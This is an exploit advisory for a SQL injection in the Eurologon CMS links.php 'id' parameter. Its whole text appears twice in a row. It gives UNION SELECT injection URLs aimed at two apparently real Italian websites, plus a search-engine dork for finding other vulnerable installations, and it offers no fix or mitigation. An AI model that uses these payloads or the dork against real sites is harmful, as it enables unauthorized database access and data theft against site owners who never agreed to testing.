Eurologon CMS SQL Injection Vuln
[o] Eurologon CMS SQL Injection Vulnerability
Software : Eurologon Content Management System
Vendor : http://www.content-manager.it/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
[o] Vulnerable file
links.php
[o] Exploit
http://localhost/[path]/links.php?id=[SQL]
[o] Proof of concept
http://www.ream.it/links.php?id=5+AND+1=2+UNION+SELECT+1,2,3,4,version(),6/*
http://www.fondazionefabretti.it/links.php?id=21+AND+1=2+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13,14/*
[o] Dork
"Powered by Eurologon"
[o] Notes
this is a private script.
Software : Eurologon Content Management System
Vendor : http://www.content-manager.it/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
[o] Vulnerable file
links.php
[o] Exploit
http://localhost/[path]/links.php?id=[SQL]
[o] Proof of concept
http://www.ream.it/links.php?id=5+AND+1=2+UNION+SELECT+1,2,3,4,version(),6/*
http://www.fondazionefabretti.it/links.php?id=21+AND+1=2+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13,14/*
[o] Dork
"Powered by Eurologon"
[o] Notes
this is a private script.